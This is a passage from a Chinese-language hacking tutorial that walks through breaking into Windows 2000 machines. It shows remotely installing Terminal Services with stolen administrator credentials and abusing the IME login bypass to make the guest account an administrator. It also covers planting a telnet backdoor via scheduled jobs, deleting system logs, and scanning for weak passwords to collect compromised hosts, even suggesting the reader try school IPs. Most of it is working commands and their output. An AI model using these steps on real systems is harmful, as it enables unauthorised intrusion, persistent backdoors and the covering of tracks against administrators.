30天打造专业红客-第3章

按键盘上方向键 ← 或 → 可快速上下翻页，按键盘上的 Enter 键可回到本书目录页，按键盘上方向键 ↑ 可回到本页顶部！
————未阅读完？加入书签已便下次继续阅读！


　　　　终端服务配置还用于为基于　Citrix　CA　的客户机配置连接。当　Citrix　CA　协议和基于　Citrix　CA　的客户软件添加到该系统时，可以使用　TCP/IP、同步、IPX/SPX　或　NetBIOS　传输协议配置这些连接
　　　　有很多朋友问怎么开启3389终端服务下面我们一起来探索一下远程开启3389的方法。　首先我们应该了解3389终端服务；可以运行在什么系统下；个人了解；终端服务在M的大部分　
　　　　产品中都可运行；如：winnt4/win2000server/win2000ADV…server/win2000DS/XP等。　
　　　　但winnt4中是需要单独购买的；2000专业版不能远程安装终端服务的；至少我没成功过。　
　　　　我们在以下的探索中；是以win2000server和高级server为例的。（现在用的也最多）。　
　　　　现在开始。　假设我们拿到了一个主机的管理员帐户和密码。　
　　　　主机：　192。168。0。1　
　　　　帐号：　administrator　
　　　　密码：　7788　
　　　　2000系统安装在c：winnt下　
　　　　从上面的的介绍可以知道；2000专业版是不可以远程安装终端服务的；那我们就要首先来　
　　　　判断此主机是专业版还是服务器版；才能进入下一个环节。　我们可以先用对方所开帐户判断：　c：》letmein　192。168。0。1　…all　…d　
　　　　stating　connecting　to　server　。。。　
　　　　Server　local　time　is：　2002…1…13　10：19：22　
　　　　Start　get　all　users　FORM　server。。。　
　　　　　
　　　　Total　=　5　
　　　　　
　　　　num0=　Administrator　（）　
　　　　num1=　Guest　（）　
　　　　num2=　IUSR_servername　（Internet　来宾帐号　）　
　　　　num3=　IWAM_servername　（启动　IIS　进程帐号）　
　　　　num4=　TsInternetUser　（TsInternetUser）　
　　　　　
　　　　Total　=　5　
　　　　　一般情况num2/3/4这三个帐户都是2000server默认开启的。　
　　　　2000专业版默认是不开这些帐户的。　我们也可以扫描对方开放的端口进一步确认：　
　　　　用扫描软件如：superscan3。exe扫描对方所开端口　
　　　　判断对方是否开启25；3372等2000server默认开启的端口。　当然我们还可以使用一些工具；如：cmdinfo。zip　
　　　　这2个东东可以获得本地或远程NT/2K主机的版本；系统路径；源盘路径；PACK版本；安装时间等一　
　　　　系列信息；一个图形界面；一个命令行。　
　　　　通过返回的信息就可以很清楚的了解对方主机情况。　还有一些其他的方法来判断；如：从对方所开的服务来确定等；　
　　　　从上面的判断准确率还算高；别的就不一一说明了。　
　　　　如果你在以上步骤里发现对方主机并没有那3个帐户；默认端口也没开；　
　　　　或cmdinfo返回的信息对方是2000专业版；你就要放弃安装3389的计划了。　
　　　　现在我们要进入下一环节：　
　　　　判断终端服务到底有没有安装？　你也许要问：为什么还要判断啊？我扫描没有发现3389端口啊
　　　　这里就需要解释一下；如果装了终端服务组件；可能有哪几种情况扫描不到3389端口？　
　　　　1。终端服务termservice在〃管理工具〃》》》〃服务〃中被禁用。　
　　　　2。终端服务连接所需的RDP协议在〃管理工具〃》》》〃终端服务配置〃中被停用连接。　
　　　　3。终端服务默认连接端口3389被人为的改变。如何改变请看修改终端服务默认的3389端口
　　　　4。终端服务绑定的网络适配器不是外网的。　
　　　　5。防火墙和端口过滤之类的问题。　
　　　　6。。。。。（还有我没想到的）　
　　　　其实；我们遇到最多的情况就是以上5种情况。　现在开始判组件是否被安装。　先与远程主机连接；映射远程主机C盘为本地Z盘　
　　　　net　use　z：　192。168。0。1c　〃7788〃　/user：〃administrator〃　
　　　　命令成功完成。　然后转到Z盘；检查　
　　　　Z：Documents　and　SettingsAll　Users「开始」菜单程序管理工具》　
　　　　里是否有　〃终端服务管理器〃和〃终端服务配置〃的快捷方式文件　
　　　　如有已安装服务组件的会有；反之；没有（98％　人为故意删的可能性较小）　
　　　　我们还可以在下一步telnet到对方主机后使用终端服务自带的命令进一步的核实。　判断完毕；对方好像是没有安装终端服务组件；可以进入下一步：　
　　　　telnet登陆对方主机；准备安装服务组件。　在这里；我强烈建议使用2000自带的telnet服务端登陆；　
　　　　有回显；不容易出错。个人感觉使用它；一次成功的比例高很多。（呵呵~；个人理解啊！）　
　　　　就算没有开；打开用完后再关掉就完了。　
　　　　。abu。写的最快速登录WIN2K　TELNET　服务已经把这个方法介绍的非常详细；　
　　　　而且他的办法（在本机建立同名；同密码帐户）；让快速实现telnet登陆成为现实。　假如我们已开启对方23端口；　
　　　　telnet　192。168。0。1　
　　　　输入用户名/密码　
　　　　*=　
　　　　欢迎使用　Microsoft　Telnet　服务器。　
　　　　*=　
　　　　C：》　
　　　　成功进入！！！！　进入后；再次检查终端组件是否安装：　
　　　　c：》query　user　
　　　　这个工具需要安装终端服务。　这样就进一步确定了组件没有被安装。如果返回：　
　　　　USERNAME　SESSIONNAME　ID　STATE　IDLE　TIME　LOGON　TIME　
　　　　》w1　console　0　运行中　。　2002…1…12　22：5　
　　　　类似这样的信息；可能组件就已安装。　好！都清楚了；可以开始安装了。　
　　　　…　
　　　　C：》dir　c：sysoc。inf　/s　//检查INF文件的位置　
　　　　c：WINNTinf　的目录　2000…01…10　20：00　3；770　sysoc。inf　
　　　　1　个文件　3；770　字节　
　　　　…　
　　　　C：》　dir　c：sysocmgr。*　/s　//检查组件安装程序　
　　　　c：WINNTsystem32　的目录　2000…01…10　20：00　42；768　sysocmgr。exe　
　　　　1　个文件　42；768　字节　
　　　　…　
　　　　c：》echo　＇ponents＇　》　c：wawa　
　　　　c：》echo　TSEnable　=　on　》》　c：wawa　
　　　　//这是建立无人参与的安装参数　
　　　　c：》type　c：wawa　
　　　　＇ponents＇　
　　　　TSEnable　=　on　
　　　　//检查参数文件　
　　　　　
　　　　c：》sysocmgr　/i：c：winntinfsysoc。inf　/u：c：wawa　/q　
　　　　…　
　　　　这一条就是真正安装组件的命令。　
　　　　以上这条命令没有加/R参数；主机在安装完后自动重起。　
　　　　如若加了/R参数主机就不会重起。　如果一切正常的话；几分钟后对方主机将会离线；当它重新回来时；　
　　　　3389终端服务就已经开启。你就可以连上去了。　问题和建议：　A　在安装过程中；不使用/R；有时主机也不会重起；你就要手动重起他；但在使用诸如：iisreset　/reboot命令时；对方　
　　　　的屏幕会出现个对话框；写着谁引起的这次启动；离重起还有多少秒。　B　一次不行可以再试一次；在实际中很有作用。　C　在输入sysocmgr命令开始安装时；一定不要把命令参数输错；那会在对方出现一个大的对话框；是sysocmgr的帮助；很是显眼；　
　　　　而且要求确定。在你的屏幕上是不会有任何反应的；你不会知道出错，所以会有B的建议。　
　　　　好了以后你就想干什么就干什么了。不过有时候还真不知道干什么，总之得干个事，装个什么局域网控制软件，不过不要体积太大，容易被发现。
　　　　超强　C　语言代码；你有信心看懂吗？
　　　　刚刚说有输入法漏洞的机子很少了，但有些朋友担心还有怎么办，不是吃大亏了吗？这样我找了一篇写的不错的文章贴一下（　注意是转载）写的不错，据说是新写的，这位大哥也真闲啊
　　　　WIN2000中文简体版存在的输入法漏洞，可以使本地用户绕过身分验证机制进入系统内部。经实验，WIN2000中文简体版的终端服务，在远程操作时仍然存在这一漏洞，而且危害更大。　
　　　　WIN2000的终端服务功能，能使系统管理员对WIN2000进行远程操作，采用的是图形界面，能使用户在远程控制计算机时功能与在本地使用一样，其默认端口为3389，用户只要装了WIN2000的客户端连接管理器就能与开启了该服务的计算机相联。因此这一漏洞使终端服务成为WIN2000的合法木马。　
　　　　工具：客户端连接管理器，下载地址：自己找吧，天天有好几种呢。　
　　　　入侵步骤：　
　　　　一，获得管理员账号。　
　　　　我们先对一个网段进行扫描，扫描端口设为3389，运行客户端连接管理器，将扫描到的任一地址加入到，设置好客户端连接管理器，然后与服务器连结。几秒钟后，屏幕上显示出WIN2000登录界面（如果发现是英文或繁体中文版，放弃，另换一个地址），用CTRL＋SHIFT快速切换输入法，切换至全拼，这时在登录界面左下角将出现输入法状态条（如果没有出现，请耐心等待，因为对方的数据流传输还有一个过程）。用右键点击状态条上的微软徽标，弹出“帮助”（如果发现“帮助”呈灰色，放弃，因为对方很可能发现并已经补上了这个漏洞），打开“帮助”一栏中“操作指南”，在最上面的任务栏点击右键，会弹出一个菜单，打开“跳至URL”。此时将出现WIN2000的系统安装路径和要求我们填入的路径的空白栏。比如，该系统安装在C盘上，就在空白栏中填入〃c：winntsystem32〃。然后按“确定”，于是我们就成功地绕过了身份验证，进入了系统的SYSTEM32目录。　
　　　　现在我们要获得一个账号，成为系统的合法用户。在该目录下找到〃net。exe〃，为〃net。exe〃创建一个快捷方式，右键点击该快捷方式，在“属性”－》“目标”－》c：winntsystem32net。exe后面空一格，填入〃user　guest　/active　：yes〃点“确定”。这一步骤目的在于用net。exe激活被禁止使用的guest账户，当然也可以利用〃user　用户名　密码／add〃，创建一个新账号，但容易引起网管怀疑。运行该快捷方式，此时你不会看到运行状态，但guest用户已被激活。然后又修改该快捷方式，填入〃user　guest　密码〃，运行，于是guest便有了密码。最后，再次修改，填入“localgroup　administrators　guest　/add，将guest变成系统管理员。　
　　　　注意事项：1、在这过程中，如果对方管理员正在使用终端服务管理器，他将看到你所打开的进程id，你的ip和机器名，甚至能够给你发送消息。　
　　　　2、终端服务器在验证你的身份的时候只留给了你一分钟的时间，在这一分钟内如果你不能完成上述操作，你只能再连结。　
　　　　3、你所看到的图像与操作会有所延迟，这受网速的影响。　
　　　　二，创建跳板。　
　　　　再次登录终端用务器，以〃guest〃身份进入，此时guest已是系统管理员，已具备一切可执行权。打开“控制面板”，进入“网络和拔号连接”，在“本地连接”或“拔号连接”中查看属性，看对方是否选择“Microsoft　网络的文件和打印机共享”，如果没有，就打上勾。对方如果使用的是拔号上网，下次拔号网络共享才会打开。　
　　　　退出对方系统，在本地机命令提示符下，输入　
　　　　net　use　IP　AddressIPC　＇〃password〃＇　/user：〃guset〃，通过IPC的远程登陆就成功了。　
　　　　登陆成功之后先复制一个Telnet的程序上去（小榕流光安装目录下的Tools目录里的Srv。exe；另外，还有ntml。xex，一会要用），这个程序是在对方上面开一个Telnet服务，端口是99。　
　　　　copy　c：hacksrv。exe　***。***。***。***admin　
　　　　然后利用定时服务启动它，先了解对方的时间：　
　　　　net　time　***。***。***。***　
　　　　显示：　
　　　　***。***。***。***　的当前时间是　2001/1/8　下午　08：55　
　　　　命令成功完成。　
　　　　然后启动srv。exe：　
　　　　at　***。***。***。***　09：00　srv。exe　　
　　　　显示：　
　　　　新加了一项作业，其作业　ID　=　0　
　　　　过几分钟后，telnet　***。***。***。***　99　
　　　　这里不需要验证身份，直接登录，显示：　
　　　　c：winnt：system32》　
　　　　我们就成功登陆上去了。然后又在本地打开命令提示符，另开一个窗口，输入：　
　　　　copy　c：hackntlm。exe　211。21。193。202admin　
　　　　把事先存放在hack目录里的ntlm。exe拷过去。然后又回到刚才的telnet窗口，运行ntlm。exe　
　　　　C：WINNTsystem32》ntlm　
　　　　显示：　
　　　　Windows　2000　Telnet　Dump；　by　Assassin；　All　Rights　Reserved。　
　　　　Done！　
　　　　C：WINNTsystem32》　
　　　　C：WINNTsystem32》　
　　　　好，现在我们来启动WIN2000本身的telnet，首先终止srv。exe的telnet服务：　
　　　　net　stop　telnet　系统告诉你并没有启动telnet，不理它，继续：　
　　　　net　start　telnet　这次真的启动了telnet，我们可以在另开的命令提示符窗口telnet到对方的　
　　　　23端口，验证身份，输入我们的guest账号和密码，它就真正成为我们的跳板了。我们可以利用它到其它的主机去。　
　　　　三、扫除脚印：　
　　　　删除为net。exe　创建的快捷方式，删除winntsystem32logfiles下边的日志文件　
　　　　＇第5天＇从简单的网络命令讲起
　　　　有个朋友问了我个问题：端口映射是什么意思？？
　　　　其实很简单的，采用端口映射（Port　Mapping）的方法，可以实现从Internet到局域网内部机器的特定端口服务的访问。例如，你所使用的机子处于一个连接到Internet的局域网内，你在机子上所开的所有服务（如FTP），默认情况下外界是访问不了的。这是因为你机子的IP是局域网内部IP，而外界能访问的只有你所连接的服务器的IP，由于整个局域网在Internet上只有一个真正的IP地址，而这个IP地址是属于局域网中服务器独有的。所以，外部的Internet登录时只可以找到局域网中的服务器，那你提供的服务当然是不起作用的。
　　　　所以解决这个问题的方法就是采用PM了。
　　　　有篇文章不错。大家看看：pconline/pcedu/soft/lan/jywgl/10301/127157。html
　　　　继续讲，昨天有人说我找到个肉鸡，但不会用远程控制软件。先说用什么好呢
　　　　我推荐Remote　Administrator，有篇介绍它的文章很好：pcworld/2002/back_issues/2205/0533e。asp
　　　　下载：skycn/soft/15592。html
　　　　我想里面的说明你应该能很好理解的
　　　　现在我以一个例子来说一下怎么获得一个肉鸡，虽然前面一直在说，但好象有点乱的，下面说的这个有点投机取巧的感觉，至少我这样觉得，不过因为很多朋友说都5天了，我什么都没搞到啊，所以只能。。
　　　　第一步：扫描弱口令
　　　　这里我用20cn开发的scanipc　（这down。yqdown/xdown/yqdown0316/scanipc。rar有下的）
　　　　不一会就会扫到很多有弱口令的主机
　　　　（你可以拿你们学校的IP试试）
　　　　这里我用opentelnet（远程启动TELNET的小东西，这里下：infosw/down/software。asp？id=1520）给扫描到开了空口令的主机开个端口让我们telnet连接上去
　　　　；开了23端口，并可以连接上的主机就不用进行次步骤了！
　　　　Opentelnet使用方法：
　　　　OpenTelnet。exe　server　　　　
　　　　列如：
　　　　C：》OpenTelnet。exe　192。168。1。2　administrator　123456　1　90　用户名：administrator　密码：123456　
　　　　NTLM认证方式：1（也可以选择0请自己测试）　开的端口：90
　　　　运行完，如果屏幕上出现　Disconnecting　server。。。